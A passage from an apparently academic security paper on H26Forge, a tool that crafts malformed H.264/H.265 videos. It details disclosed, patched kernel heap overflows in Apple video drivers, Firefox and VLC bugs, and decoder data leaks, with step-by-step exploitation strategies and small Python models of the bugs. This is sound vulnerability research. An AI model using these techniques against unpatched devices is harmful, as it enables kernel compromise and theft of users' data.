Bug 2: infinite loop. The second issue we discovered was a denial-of-service bug in the AppleD5500.kext caused by an infinite loop in a kernel thread. The infinite loop causes the device to heat up, then reboot due to a panic induced by a watchdog timeout. Like Bug 1, this bug can be triggered by playing or generating a preview thumbnail of a malformed video. A video randomly generated by H26Forge triggered this bug and caused a kernel panic; we then reverse engineered the affected code to perform a root-cause analysis. Apple assigned this bug CVE-2022-42846 and patched it in iOS and iPadOS versions 15.7.2 and 16.2 [4, 5].

We found this issue when generating videos with IDR NALUs with Inter predicted slice types. IDR NALUs are meant to be Intra predicted slices that force the decoder to flush its decoded picture buffer (DPB); Inter prediction thus has a list of 0 DPBs to work with, a condition that the parsing code did not anticipate. A missing check for arithmetic overflow in computing loop bounds and some unlucky choices for variable types lead to a loop of the form for (uint8 i = 0; i < 256; i++). The loop body corrupts a heap object used by the decoder, but does not overflow into adjacent heap objects. After 180 seconds, a watchdog forces a panic and device restart.

Apple’s assessment was that “[p]arsing a maliciously crafted video file may lead to unexpected system termination.”

5.2 Quick proofs of concept

In some cases, a security analyst who is auditing video-handling code may have reason to believe that a bug exists; for example, she may spot a missing bounds check in the code. Due to the complexity of modern video encodings like H.264, it is difficult to create a test video which demonstrates the existence of the bug. This is due to a lack of appropriate tooling. For example, existing video encoders will not produce such spec-nonconforming videos and due to the nature of the entropy encoding, making localized changes to existing videos with a hex editor is difficult.

With H26Forge, the process of producing a proof of concept is simplified. The analyst starts with an existing video and uses H26Forge to transform it into a video that has the desired property. Because H26Forge understands the video format, the resulting video will be syntactically correct.

A bug in H.265 decoding. Through reverse engineering of the H.265 decoder in the AppleD5500.kext for iOS 15.5, we discovered what appeared to be a missing bounds check potentially leading to a heap overflow in the H.265 decode object. To verify this, we modified H26Forge with enough H.265 tooling to produce a proof-of-concept video that causes a controlled kernel heap overflow. Unlike the previously described bugs, we were able to trigger this bug only when playing a video, not through preview thumbnail generation. Apple assigned this bug CVE-2022-42850 and patched it in iOS and iPadOS version 16.2 [5].

H26Forge was not built to support H.265, but because the bug was in SPS parsing, for which H.265 and H.264 use similar encodings, we were able to produce our proof-of-concept video without the wholesale revamp of H26Forge that would be required for implementing H.265’s stateful entropy encodings.

The vulnerability is a missing bounds check for num_short_term_ref_pic_sets. This value dictates how many short term reference picture set (RPS) objects should be in the SPS, which the spec (but not Apple’s implementation) caps at 64.¹⁷ The short term RPS objects, each 172 bytes long, are copied from the video bitstream into an array member variable of a decoder context object; after the array is filled, subsequent RPS objects overwrite the remainder of the context object and then adjacent heap allocations.

With the help of H26Forge, we confirmed that a malicious video can overwrite heap memory. Through reverse engineering of the decoder, we identified an exploitation strategy that allows the attacker to take control of the kernel pc register and used H26Forge to develop a proof-of-concept exploit following this strategy. Our strategy overwrites another member variable within the context object, so it does not require heap grooming. However, it does require knowledge of kernel heap layout, so in an end-to-end exploit would need to be combined with a kernel memory disclosure bug.

The member variable we overwrite is a pointer to an object that has a virtual destructor, called when decoding ends and

¹⁶ Specifically, the array stores adjusted bit offsets, so the $i$th EPB, at byte offset $b$, is recorded as $A[i] \leftarrow 8(b - i)$. The 257th EPB overwrites $i$ with $8(b_{257} - 256)$, and as a result the 258th EPB stores $8\bigl(b_{258} - 8(b_{257} - 256)\bigr)$; NALU length limits keep $b_{258}$ from being more than 8 times $b_{257}$.

¹⁷ An H.265 video can have at most 65 RPSes: 64 in the SPS and 1 in a slice header. AppleD5500.kext’s SPS RPS array is length 65 to accommodate this, but it does not impact our analysis.
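The arithmetic in footnote 16 can be traced with a small model. The following is a minimal sketch, not the driver's code: it assumes the counter sits in the slot directly after the 256-entry array (as the text states) and that the counter is advanced before the store, an ordering chosen here only because it reproduces the footnote's formulas. The function name `record_epbs` and the sample byte offsets are hypothetical, and Python integers stand in for the 32-bit values.

```python
ARRAY_LEN = 256  # number of EPB slots in the reader object, per the text


def record_epbs(byte_offsets):
    """Return the (slot, value) store made for each EPB by a reader with no bounds check."""
    count = 0    # conceptually stored in the slot right after the array (slot ARRAY_LEN)
    writes = []
    for b in byte_offsets:
        i = count
        count = i + 1            # assumption: the counter is bumped before the store
        value = 8 * (b - i)      # adjusted bit offset, A[i] <- 8(b - i)
        if i == ARRAY_LEN:
            count = value        # the 257th store lands on the counter itself
        writes.append((i, value))
    return writes


# Hypothetical stream with one EPB every three bytes.
offsets = [3 * (k + 1) for k in range(259)]
writes = record_epbs(offsets)
for slot, value in writes[255:]:
    print(slot, value)
```

In this model the 257th EPB turns the counter into a large index (the skip), and every later EPB stores a negative value at consecutive slots, which matches the skip-and-write behaviour described for Bug 1.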
the context object is freed. By overwriting this pointer with the address of a fake object that itself points to a fake vtable, we can arrange to have any address of our choosing called in place of the legitimate destructor.¹⁸

We did not attempt to develop an end-to-end exploit chain; however, Apple’s assessment was that this bug, like Bug 1, may allow an app “to execute arbitrary code with kernel privileges.”

H26Forge was crucial in the development of this video, as given the lack of byte-alignment in exp-Golomb encoded values, hand tuning this file would be difficult. Updating the video to target new addresses, or overwrite another object is straightforward via our video transform.

5.3 Interactive testing

The third way an analyst can use H26Forge is to interactively test video decoding as part of a complete examination, or even root-cause analysis, of an in-the-wild exploit. For example, CVE-2022-22675 is an out-of-bounds write due to a missing bounds check in the AppleAVD.kext affecting iOS versions up to 15.4. Google Project Zero’s write up of the bug [43] includes a partial proof-of-concept video which does not lead to a crash.

We reverse engineered AppleAVD.kext and used a kernel debugger to test our hypotheses about the bug and its effects. H26Forge was crucial for producing the video inputs for these debugging sessions.

Notation. When describing SPSes and PPSes, we include the ID in the subscript (e.g., $\mathrm{SPS}_{\mathrm{ID}}$, $\mathrm{PPS}_{\mathrm{ID}}$). For slices we include the PPS ID it points to in the subscript and the type in a superscript (e.g., $\mathrm{Slice}^{\mathrm{Type}}_{\mathrm{PPS\,ID}}$).

The CVE-2022-22675 bug. This bug was a missing bounds check for the cpb_count_minus1 syntax element located in a function called parseHRD which recovers the hypothetical reference decoder (HRD) parameters, nested within SPS parsing. SPSes can have two different HRD parameters, and their usage and syntax elements are described in Annexes C and E of the H.264 spec [23]. According to the spec, cpb_count_minus1 should have a maximum possible value of 31, but because there is no bounds check and the value is exp-Golomb encoded, we can set it to the maximum value AppleAVD.kext can store: 255. This parameter is used as a loop bound to parse two exp-Golomb encoded uint32 values that are not bounds checked, and an additional single bit. As these are stored in arrays of length 32, when the counter goes past the expected length AppleAVD.kext will begin to write into the rest of the SPS object and then past the SPS’s allocated memory. Because of where the second HRD parameters are in the SPS object, this overflow can overwrite at most 832 bytes past the SPS object.

The SPS object is contained in an array of length 32 in an AppleAVD.kext H.264 User Context. The SPS is indexed by its seq_parameter_set_id, with subsequent SPSes with the same ID overwriting previously decoded ones. Immediately after the SPS array is a PPS array of length 256, similarly indexed by pic_parameter_set_id. This means that an overflowing HRD parameter will impact either a neighboring SPS or PPS, depending on the seq_parameter_set_id. An SPS object is 2224 bytes long and a PPS object is 604 bytes long, so we can either overwrite the first part of a neighboring SPS or completely rewrite the PPS at index 0 along with the start of the PPS at index 1.

For the overwrite to have an effect, though, the overflowing HRD parameter must be decoded after a benign SPS or PPS has already been decoded to modify what the parameters should be, otherwise anything written in the overflowed space will be cleared out when decoding the benign SPS or PPS.

The Project Zero proof-of-concept. Using H26Forge, we are able to explain why the proof-of-concept video in the Project Zero writeup does not cause a crash. First, the video NALUs are not properly ordered. It starts with an SPS of ID 31 containing the out-of-bounds cpb_count_minus1, a PPS of ID 0, and a slice pointing to PPS 0. As is, the malformed SPS would be decoded before the benign PPS, thus any overwritten values would be ignored by the subsequent parsing of the PPS. Second, the PPS points to an SPS of ID 0, but since that does not exist at decoding time, the decoder halts. This proof-of-concept video is quite large, at 20 MB, but we verified by stepping through the Corellium kernel debugger that decoding stops when the first slice cannot find a valid SPS.

An H26Forge-produced proof-of-concept. We outline the steps necessary to construct a video that induces a controlled kernel heap overflow by overwriting a PPS parameter. Figure 3 shows our overall strategy. More details about our final step are in Appendix A.

Step 1: correct ordering. We use H26Forge to generate a video with the following NALUs: $\mathrm{SPS}_0$, $\mathrm{PPS}_0$, $\mathrm{SPS}_0$, $\mathrm{Slice}^{I}_{0}$, and $\mathrm{Slice}^{P}_{0}$. The second SPS NALU is where the parseHRD overflow will exist to corrupt $\mathrm{PPS}_0$.

Step 2: fix the IDs. We create a video transform to adjust parameter IDs. We set the second SPS’s ID to 31 so it will be stored at the end of the SPS array. With H26Forge we produce both a raw H.264 file and an MP4 video¹⁹ with the following order: $\mathrm{SPS}_0$, $\mathrm{PPS}_0$, $\mathrm{SPS}_{31}$, $\mathrm{Slice}^{I}_{0}$, $\mathrm{Slice}^{P}_{0}$.

¹⁸ Arm Pointer Authentication, which would have prevented us from faking a vtable, was not introduced until the Apple A12 [6], whereas the last Apple SoC to use AppleD5500.kext was the A11.

¹⁹ MP4 files contain an avcC atom with all SPSes and PPSes together. MP4 parsers will decode all SPSes, then PPSes, which conflicts with the desired order of events. The MP4 muxer in H26Forge is modified to only add the first observed SPS and PPS to the avcC atom, and subsequent parameter sets to mdat atoms. Thus, we cannot hit the vulnerable code-path by thumbnailing, but may be able to target local privilege escalation. An SPS overwrite may be possible through thumbnailing.
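The reason Step 2 moves the malformed SPS to ID 31 follows from the array layout described above. The sketch below is only arithmetic on the sizes quoted in the text (32 SPS objects of 2224 bytes, then 256 PPS objects of 604 bytes, and at most 832 bytes written past the SPS). It assumes the elements are packed back to back with no padding, and the name `overflow_targets` is hypothetical.

```python
SPS_SIZE, SPS_COUNT = 2224, 32    # sizes and lengths as quoted in the text
PPS_SIZE, PPS_COUNT = 604, 256
MAX_OVERFLOW = 832                # most bytes written past the end of the SPS object


def overflow_targets(sps_id, overflow=MAX_OVERFLOW):
    """List (kind, index, bytes_overwritten) for bytes written past SPS[sps_id]."""
    # Assumption: the SPS array is immediately followed by the PPS array, no padding.
    objects = [("SPS", i, SPS_SIZE) for i in range(SPS_COUNT)]
    objects += [("PPS", i, PPS_SIZE) for i in range(PPS_COUNT)]
    hits = []
    remaining = overflow
    for kind, index, size in objects[sps_id + 1:]:
        if remaining <= 0:
            break
        covered = min(size, remaining)
        hits.append((kind, index, covered))
        remaining -= covered
    return hits


print(overflow_targets(31))   # last SPS slot: the overflow spills into the PPS array
print(overflow_targets(5))    # any other slot: only the next SPS is touched
```

With the SPS in slot 31 the overflow covers all 604 bytes of the PPS at index 0 and the first 228 bytes of the PPS at index 1; from any lower slot it reaches only the first 832 bytes of the neighboring SPS.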
[Figure 3 diagram: the H.264 bitstream (left) and the H.264 User Context in memory (right, with SPS, PPS, and Slices regions), annotated with parseHRD, parsePredWeightTable, the decoded slice headers, and the write direction.]

Figure 3: Exploiting CVE-2022-22675. The left-hand side shows the correctly ordered H.264 bitstream, read from top to bottom, and the right-hand side shows the decoded contents in memory as they are filled in. (1) The initial SPS and PPS parameters are read, each with ID 0 ($\mathrm{SPS}_0$, $\mathrm{PPS}_0$). (2) An SPS with ID 31 is parsed, where we use an out-of-bounds cpb_count_minus1 in parseHRD to overwrite $\mathrm{PPS}_0$. (3) $\mathrm{PPS}_0$ is overwritten with an out-of-bounds num_ref_idx_l0_active_minus1, used in Slice decoding. (4) The overwritten num_ref_idx_l0_active_minus1 causes a second overflow in parsePredWeightTable, writing a 16-bit value $B_n$ greater than 255 at a controlled offset away, with intermediate memory set to a default value. (5) Arbitrary length values can be written by adjusting the offset in each subsequent slice, writing the values backwards.

Step 3: add the overwrite. With our video that contains the IDs in the correct order, we can now change the syntax elements of $\mathrm{SPS}_{31}$ to trigger CVE-2022-22675. Parts (1) and (2) of Figure 3 illustrate the ordering and this overflow.

The HRD parameters are part of an optional syntax element nested inside an SPS. We first use a video transform to ensure that the parameters will be parsed, then we set cpb_count_minus1 to 255. To understand how the syntax elements in the loop are used during the overwrite, we set both exp-Golomb encoded values to a noticeable pattern, and all the byte-sized flag values to true.

We now have a video with the following order: $\mathrm{SPS}_0$, $\mathrm{PPS}_0$, $\mathrm{SPS}^{*}_{31}$, $\mathrm{Slice}^{I}_{0}$, $\mathrm{Slice}^{P}_{0}$, where $\mathrm{SPS}^{*}_{31}$ contains the overwrite.

Step 4: control the overwrite location, and produce a second overflow. Setting a breakpoint at slice header decoding in the iOS kernel debugger while playing the video from the previous step allows us to inspect memory and identify write targets in the PPS. We describe an exploit strategy that uses the capability described so far to overwrite the num_ref_idx_l0_active_minus1 PPS parameter.

This parameter is used as a loop bound in prediction weight table syntax parsing, parsePredWeightTable, in which certain 16-bit values are copied from the bitstream to an array member variable in the H.264 User Context object. According to the spec, num_ref_idx_l0_active_minus1 should be at most 31, a limit that AppleAVD.kext correctly checks when parsing PPS parameters. By overwriting this parameter with larger values using the first-stage overflow, we can exceed its limit and cause the parsePredWeightTable loop to write past the end of the array allocated for it within the H.264 User Context object, triggering a second overflow. This is depicted in part (3) of Figure 3.

In a video transform, we set cpb_count_minus1 to stop looping at the position it can write num_ref_idx_l0_active_minus1, and use one of the exp-Golomb encoded HRD parameters to set it to its maximum value of 255.

Step 5: satisfy constraints and enable second overflow. Arranging for the first overflow to overwrite num_ref_idx_l0_active_minus1 with a larger value is not enough. We must make sure that other PPS parameters we overflow take on reasonable values to avoid an early exit from video decoding because of a failed AppleAVD.kext check. We must also make sure that slice headers that refer to the PPS parameters we overwrite are Inter predicted and do not have num_ref_idx_active_override_flag set; otherwise prediction weight table syntax parsing is skipped. We must also fill in the slice headers with enough prediction weight table parameters to account for the overwritten loop bound, not the original maximum of 31.

With these additional constraints satisfied, we can trigger a kernel panic due to an out-of-bounds write past the allocated memory of the H.264 User Context.

Step 6: controlling the second overflow. Unfortunately, the crashing video is not immediately useful for heap corruption, for two reasons. First, the overwrite we trigger is so large that it overflows not only the User Context but also the kernel heap as a whole, because the loop bound is derived by sign extending the num_ref_idx_l0_active_minus1 parameter from 8 bits to 32. Second, the 16-bit values the loop writes to the heap are badly constrained: Each must be between 0 and 255 or the loop stops after writing it.

These two problems neatly solve each other. By arranging for the bitstream to include a larger-than-255 value when we have written enough, we can get the loop to exit early despite the huge loop bound. The 16-bit values before the last one must still be between 0 and 255. Part (4) of Figure 3 shows this arrangement, with the last value written denoted $B_n$.
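The interaction between the two problems in Step 6 can be made concrete with a toy loop. This is a sketch under stated assumptions, not the AppleAVD.kext code: `loop_bound_from_u8` and `copy_weights` are hypothetical names, the sign-extended bound is assumed to be compared as an unsigned 32-bit number, and the bound is treated as a "minus1" count.

```python
def loop_bound_from_u8(param):
    """Sign-extend an 8-bit value to 32 bits and read the result as unsigned."""
    param &= 0xFF
    signed = param - 0x100 if param & 0x80 else param   # 255 becomes -1
    return signed & 0xFFFFFFFF                           # -1 becomes 0xFFFFFFFF


def copy_weights(bitstream_values, loop_bound):
    """Toy copy loop: store 16-bit values, stopping after the first one above 255."""
    written = []
    for index, value in enumerate(bitstream_values):
        if index > loop_bound:        # assumption: the bound is a "minus1" count
            break
        written.append(value & 0xFFFF)
        if value > 255:               # per the text, the loop stops after writing it
            break
    return written


bound = loop_bound_from_u8(255)
values = [0, 0, 0, 0x4141, 7, 7]      # filler in 0..255, then the terminating value
print(hex(bound), copy_weights(values, bound))
```

The overwritten parameter 255 yields an effectively unbounded loop, so the only practical stop condition is the value check; placing one larger-than-255 value in the bitstream ends the copy exactly where the writer wants it.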
If we include further slices that reference the PPS parameters we overflowed, we can cause the overflowing loop to execute again, copying a different part of the bitstream into the same User Context object. By working backwards, with each slice writing fewer bytes than the ones before, we avoid undoing the work done earlier in the exploit. This technique is illustrated in part (5) of Figure 3. The first slice writes the out-of-bounds value $B_n$ and stops; the second writes $B_{n-1}$ and stops; and so on, until after $k$ slices we have written $2k$ arbitrary bytes at an arbitrary offset from the User Context object. We provide more details on how we arrange the bitstream in Appendix A.

Exploitation. We have used H26Forge to automate the creation of a video that uses the described exploit strategy to write an attacker-chosen payload at an attacker-chosen offset from the H.264 User Context object in the iOS kernel heap. As with our Bug 3 from Section 5.2, leveraging this heap-overflow primitive into arbitrary kernel execution is likely to require heap grooming and a kernel address disclosure bug, with the presence of pointer authentication in SoCs that use AppleAVD compounding the challenge. A recent presentation by Tarakanov and Labunets discusses these challenges and proposes some AppleAVD exploitation strategies [45].

6 More H26Forge Findings

We describe more issues discovered by using H26Forge as a grammar-aware fuzzer and to generate proof-of-concept videos. We start by showing that heavily fuzzed desktop software, such as Firefox and VLC, can have vulnerabilities unearthed through our technique of producing H.264 videos with unexpected syntax element values. Then, we describe issues that primarily affect hardware video decoding, such as fingerprinting and vulnerable implementations.

6.1 Firefox crash and information leak

We tested generated videos on Firefox 100 as described in Section 5.1, and discovered an out-of-bounds read that causes a crash of the Firefox GPU utility process and a user-visible information leak. The issue arises from conflicting frame sizes provided in the MP4 container as well as multiple SPSes across video playback. Note that both the crash and information leak are caused by a single video. To exploit this vulnerability an attacker has to get the victim to visit a website on a vulnerable Firefox browser. We reported this finding to Mozilla, and it has been assigned CVE-2022-3266 and patched in version 105 [33].

Since Firefox cannot play raw H.264 files, we mux our generated videos into an MP4 file. The MP4 file contains frame width and height metadata, but this information does not need to match the encoded data. For every MP4 video we created, we set the width and height to a small constant, regardless of actual video encoding size. Firefox relied on this MP4 metadata to create video frames, but because the encoded frame size was larger than expected, we were able to trigger a buffer overflow in the GPU utility process. This was patched by changing the utility process to rely on the returned frame parameters rather than the stored metadata.

Due to the GPU utility process crashing, Firefox fell back to decoding the video in software. From the provided analysis, the Firefox software decoder took frame size parameters from only the first SPS and did not adjust to SPS changes. Thus, because our encoded video has an initial SPS with frame size parameters bigger than the second SPS, Firefox was unable to fill up the frame contents of slices after the SPS change, and we were able to read the contents of memory. Figure 4 shows what the user saw. Firefox patched this by adding code to use the correct SPS when creating a frame size.

H26Forge can set the width and height of an MP4 to either the actual frame size, a random value, or a user specified value, without having to worry about MP4 atoms. It can also generate videos with multiple SPSes. By adjusting the SPS frame size parameters with a video transform, H26Forge can control how much information is read out.

6.2 VLC use-after-free

On VLC for Windows version 3.0.17, we discovered a use-after-free vulnerability in FFmpeg’s libavcodec that arises when interacting with Microsoft Direct3D11 Video APIs. We found this by testing generated videos in VLC. The bug is triggered when an SPS change in the middle of the video forces a hardware re-initialization in libavcodec. If exploited, an attacker could gain arbitrary code execution with VLC privileges. We reported this issue to VLC and FFmpeg, and they have fixed it in VLC version 3.0.18 and FFmpeg commit cc867f2.²⁰

The use-after-free comes from libavcodec’s multithreaded handling of hardware contexts. VLC will create a libavcodec context, and send each NALU to this context for processing. Libavcodec assigns each NALU to a thread, which interacts with the hardware context to decode a frame. When a libavcodec thread encounters a new SPS, it frees the old hardware context and re-initializes a new one with the new SPS parameters. It then sends the updated hardware context to the other threads for synchronization.

Unfortunately, libavcodec forgot to update the main thread with this new context, so when the video finishes and VLC tries to close the libavcodec context, the stale hardware context address is freed again. Before freeing the address, libavcodec checks the data at the address to determine whether to call a virtual destructor. It is possible that an attacker-groomed heap may lead to a use-after-free and code execution as the VLC process.

²⁰ Online: https://github.com/FFmpeg/FFmpeg/commit/cc867f2c09d2b69cee8a0eccd62aff002cbbfe11.
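The stale-context pattern described for libavcodec can be illustrated with a toy model. This is not libavcodec's code or API: `ToyAllocator` and `play` are hypothetical, addresses are plain integers, and the model only tracks which holder still points at a freed hardware context when the decoder is closed.

```python
class ToyAllocator:
    """Tracks live allocations so that a second free of the same address is detected."""

    def __init__(self):
        self.live = set()
        self.next_addr = 0x1000

    def alloc(self):
        addr = self.next_addr
        self.next_addr += 0x100
        self.live.add(addr)
        return addr

    def free(self, addr):
        if addr not in self.live:
            raise RuntimeError(f"stale context freed again: {addr:#x}")
        self.live.remove(addr)


def play(update_main_thread):
    """Simulate one mid-stream SPS change followed by closing the decoder."""
    heap = ToyAllocator()
    main_ctx = heap.alloc()          # hardware context created when decoding starts
    worker_ctx = main_ctx            # the worker thread shares the same context

    heap.free(worker_ctx)            # worker sees a new SPS and frees the old context
    worker_ctx = heap.alloc()        # and re-initializes a new one
    if update_main_thread:
        main_ctx = worker_ctx        # the synchronization step the text says was missing

    heap.free(main_ctx)              # closing the decoder frees the main thread's copy
    return "closed cleanly"


print(play(update_main_thread=True))
```

Calling `play(update_main_thread=False)` raises in this model because the main thread still holds the address that the worker already freed, which is the condition the two-SPS proof-of-concept video exercises.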
Figure 4: Information leak in Firefox. A video that contains two SPSes with the second having a smaller vertical frame size causes the space to be filled with uninitialized memory.

With H26Forge, we can generate a small proof-of-concept video with two SPSes that triggers the vulnerability. A better understanding of how encoded videos impact VLC memory may allow a security researcher to develop an exploit with H26Forge.

6.3 Issues found in hardware and drivers

We tested the videos produced by H26Forge on a variety of Android devices with varying hardware video decoders, all listed in Table 2. In doing so, we found issues that span different hardware manufacturers, and more serious vulnerabilities in hardware decoders and their associated kernel drivers. To target a breadth of video decode IP, we went with older, cheaper SoCs, but note that some of our findings (such as Luma Chroma Thief) impact newer MediaTek devices as well, and the videos produced by H26Forge can be used to test new and future devices.

6.3.1 Fingerprinting

Perhaps unsurprisingly, we find that videos created with H26Forge produce frames with different pixel values when decoded on different devices, and therefore can serve as a browser fingerprinting mechanism through the HTML5 video element and the new WebCodecs API [1]. Fingerprinting is possible even with spec-conforming videos, but non-conforming videos distinguish some otherwise equivalent implementations.

(Browsers expose many APIs usable for fingerprinting [25], so we do not claim that an additional mechanism will upset the balance of tracking and anonymity on the web.)

We focus on exploring entropy-encoded prediction variables, such as Intra prediction mode, and Inter prediction motion vector differences. Because these syntax elements are CABAC/CAVLC encoded, the browser will forward them to the underlying hardware decoder. For Intra predicted values, we find that edge-most Intra prediction, which we discuss further in the next section, can illuminate hardware differences. Similarly, motion vector differences set to values that are larger than the frame size have different results depending on whether the hardware decides to (1) trim the value; (2) ignore the value; or (3) perform a modulo operation on the value with some internal value.

Most video decoders have some kind of error resilience features to still display an image even if there is an error in the encoded video, which can also serve as a fingerprinting mechanism. Some decoders decide to cover up errors by overwriting the rest of the frame with a specific value, often 0x00 or 0x80, copy over the last correctly decoded frame, or perform a neighboring Intra prediction to paint over the error.

6.3.2 Luma Chroma Thief: Multiple device information disclosure

A common vulnerability across decoders allowed us to recover stale or uninitialized data from the decoder. We call this vulnerability Luma Chroma Thief (LCT). Figure 5 gives a high level overview of the issue. To exploit this, an attacker needs to convince a victim to play the video where the attacker can see the output. We reported LCT to Google and MediaTek, and MediaTek said the output is “randomized dummy data,” thus not security-critical.

Figure 5: Luma Chroma Thief. On the left, we vertically Intra predict at the top-most row of macroblocks. On the right, we horizontally Intra predict at the left-most column of macroblocks.

LCT works by exploiting Intra prediction at the top-most and left-most edges of a frame. On the top-most row of macroblocks, vertical Intra prediction should not be possible because there are no reference macroblocks. We find that when we construct a video with these operations, we can recover pixels from the most recently decoded video, or videos decoding in parallel. We note that this would only take the bottom-most row of pixels, so entire frame reconstruction is not possible with this method. Because chroma and luma are stored separately, we can choose which components to read. On some devices, if (1) enough time has elapsed, (2) no video has been re-
Table 2: Evaluated devices, sorted by VPU. All run an Android Agent, with the Chromebook relying on Android Runtime on Chrome OS [35]. The “HDT” column gives the number of hardware decoding threads. EMUI and MIUI are modifications by Huawei and Xiaomi respectively. The “Kernel” column gives the version number of the Linux kernel.

Device | Type | SoC | VPU | HDT | OMX Name | Android Version | Kernel
Odroid C2 | SBC | Amlogic S905 | Amlogic Video Engine | 1 | OMX.amlogic.avc.decoder.awesome | 6.0.1 | 3.14.29
Pine A64 | SBC | Allwinner A64 | CedarV | 4 | OMX.allwinner.video.decoder.avc | 7.1.2 | 3.10.105
Huawei Honor 9x | Phone | HiSilicon Kirin 710 | HiSilicon VDEC V200 | 16 | OMX.hisi.video.decoder.avc | 9 (EMUI 9.1.0) | 4.9.148
HP Chromebook 11a | Netbook | MediaTek MT8183 | MediaTek VPU | 8 | c2.vda.avc.decoder | 9 | 5.10.114
Lenovo TB-7305F | Tablet | MediaTek MT8321 | MediaTek VPU | 4 | OMX.MTK.VIDEO.DECODER.AVC | 9 | 4.9.117
Xiaomi Redmi Note 8 Pro | Phone | MediaTek Helio G90T | MediaTek VPU | 16 | OMX.MTK.VIDEO.DECODER.AVC | 9 (MIUI 11.0.4.0) | 4.14.94
Xiaomi Redmi 9C | Phone | MediaTek Helio G35 | MediaTek VPU | 16 | OMX.MTK.VIDEO.DECODER.AVC | 10 (MIUI 12.0.7) | 4.9.190
Huawei MediaPad M5 Lite | Tablet | HiSilicon Kirin 659 | PowerVR D5500 | 8 | OMX.IMG.MSVDX.Decoder.AVC | 8 (EMUI 8) | 4.4.23
Huawei Honor 8 (FRD-AL10) | Phone | HiSilicon Kirin 950 | PowerVR D5500 | 8 | OMX.IMG.MSVDX.Decoder.AVC | 7 (EMUI 5.0.1) | 4.1.18
Dragonboard 410C | SBC | Qualcomm Snapdragon 410 | Qualcomm Venus | 8 | OMX.qcom.video.decoder.avc | 5.1.1 | 3.10.49
Galaxy Tab E | Tablet | Qualcomm Snapdragon 410 | Qualcomm Venus | 8 | OMX.qcom.video.decoder.avc | 7.1.1 | 3.10.49
Nano Pi M4 | SBC | Rockchip RK3399 | RKVdec/Hantro | 6 | OMX.rk.video_decoder.avc | 8.1 | 4.4.167
Odroid XU4 | SBC | Samsung Exynos 5422 | Samsung MFC | 8 | OMX.Exynos.AVC.Decoder | 4.4.4 | 3.10.9
VANKYO MatrixPad S21 | Tablet | UNISOC SC9863A | UNISOC VSP | 10 | OMX.sprd.h264.decoder | 9 | 4.4.147
VANKYO MatrixPad S10 | Tablet | UNISOC SC7731E | UNISOC VSP | 10 | OMX.sprd.h264.decoder | 9 | 4.4.147

cently decoded, or (3) there is no other decode going on at the same time, we can recover uninitialized data from the decoder.

To generate LCT, we start with a video that contains an SPS, PPS, and I slice, then remove all the residue, disable the deblocking filter, and set the macroblocks to be a target macroblock type. Listing 1 shows a video transform to generate LCT. Based on the specification, we can do Intra prediction at three different granularities: 16 × 16, 8 × 8, and 4 × 4. Note that the 8 × 8 granularity forces the block to go through the deblocking filter [30], so the 8 × 8 predicted blocks will not provide the exact recovered values. When testing LCT on devices, we find all granularities produce consistent results. Even though only the top-most or left-most columns will read from buffers with unexpected values, we copy the same Intra prediction mode for the rest of the slice to amplify the data.

We test the vertical and horizontal LCT videos against a target video when running in parallel and sequentially. Parallel decoding means we start the target video, start LCT, and stop the target video. In this scenario, each video is consuming a single thread of the hardware video decoder. When testing sequentially, we play LCT after the target video has stopped, thus testing if there is any leftover data in the hardware video decoder. Figure 6 shows what LCT looks like on the VANKYO S21, which allows for parallel stealing. Table 3 shows the results for all our target devices.

Because the values that we modify are in the CAVLC/CABAC encoded macroblock layer, the issues lie at the hardware video decoder level, either in the firmware or hardware. Furthermore, all layers (browser, decoder, kernel driver) that inspect the video cannot determine whether a video contains LCT logic without decoding it completely.

Table 3: Luma Chroma Thief results for test devices. We run both horizontal (HLCT) and vertical (VLCT) LCT in parallel with another video and sequentially right after another video has been decoded. Devices are grouped by VPU.

Device | HLCT-P | HLCT-S | VLCT-P | VLCT-S
Odroid C2 | N/A | Thief | N/A | Thief
Pine A64 | Uninit | Uninit | Uninit | Uninit
Huawei Honor 9x | 0x80/Thief | 0x80/Uninit | 0x80/Thief | 0x80/Uninit
HP Chromebook 11a | Y:0x10; UV:0x80 | Y:0x10; UV:0x80 | Uninit | Uninit
Lenovo TB-7305F | Y:0x10; UV:0x80 | Y:0x10; UV:0x80 | Y:0x10; UV:0x80 | Y:0x10; UV:0x80
Xiaomi Redmi Note 8 Pro | 0x00 | 0x00 | Uninit | Uninit
Xiaomi Redmi 9C | 0x00 | 0x00 | Uninit | Uninit
Huawei MediaPad M5 Lite | 0x80 | 0x80 | 0x00 | 0x00
Huawei Honor 8 (FRD-AL10) | 0x80 | 0x80 | 0x00 | 0x00
Dragonboard 410C | 0x00 | 0x00 | Thief | Thief
Galaxy Tab E | 0x00 | 0x00 | Thief | Thief
Nano Pi M4 | 0x80 | 0x80 | 0x80 | 0x80
Odroid XU4 | 0x00 | 0x00 | 0x80 | 0x80
VANKYO MatrixPad S21 | Thief | Uninit | Thief | Uninit
VANKYO MatrixPad S10 | No Output | No Output | Thief | Uninit

Thief: LCT was successful in stealing pixels.
Uninit: LCT was able to read uninitialized data.
No Output: The surface value was black, and output to a file was empty.
Hex numbers: the value of the indicated component(s) (e.g., Y:0x10; UV:0x80) or the value of each YUV component (e.g., 0x80).
N/A: The Odroid C2 has a single-threaded decoder, so parallel decoding is not possible.
0x80/Thief/Uninit: the Honor 9X produced a frame that was mostly error concealed, except for a single macroblock.

6.3.3 Hardware memory traversal

During our analysis, we found log messages from the D5500 in Kirin SoCs and the MediaTek VPU that suggest the ability to traverse hardware memory using two different syntax elements. First, the first_mb_in_slice slice header syntax element is used as a part of the ASO feature to denote where in the frame to start writing. Second, the mb_skip_run slice data syntax element allows CAVLC encoded videos to skip macroblocks in the frame that are the same as reference ones.

The log messages indicated that either a first_mb_in_slice or mb_skip_run larger than the frame size may lead to an out-of-bounds access. We found evidence of this in the D5500 in Kirin SoCs, but were not able to produce further results. For the MediaTek VPU we are able to show a denial-of-service vulnerability on the Redmi Note 8 Pro. Both issues are available from video thumbnailing, so an attacker just has to send a video where a victim may get a thumbnail.
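To make the missing check concrete, the following is a minimal sketch of the bounds validation that a parser could apply to first_mb_in_slice and mb_skip_run before handing them to hardware. It is an illustration under stated assumptions, not code from any driver or firmware discussed here: the helper names are hypothetical, macroblocks are taken to be 16 × 16, and frames are assumed to be non-MBAFF so that macroblock addresses run from 0 to the frame size in macroblocks minus one.

```python
MB_SIZE = 16  # H.264 macroblocks cover 16 x 16 luma samples


def frame_size_in_mbs(width_px: int, height_px: int) -> int:
    """Number of macroblocks in a frame, rounding each dimension up."""
    width_mbs = (width_px + MB_SIZE - 1) // MB_SIZE
    height_mbs = (height_px + MB_SIZE - 1) // MB_SIZE
    return width_mbs * height_mbs


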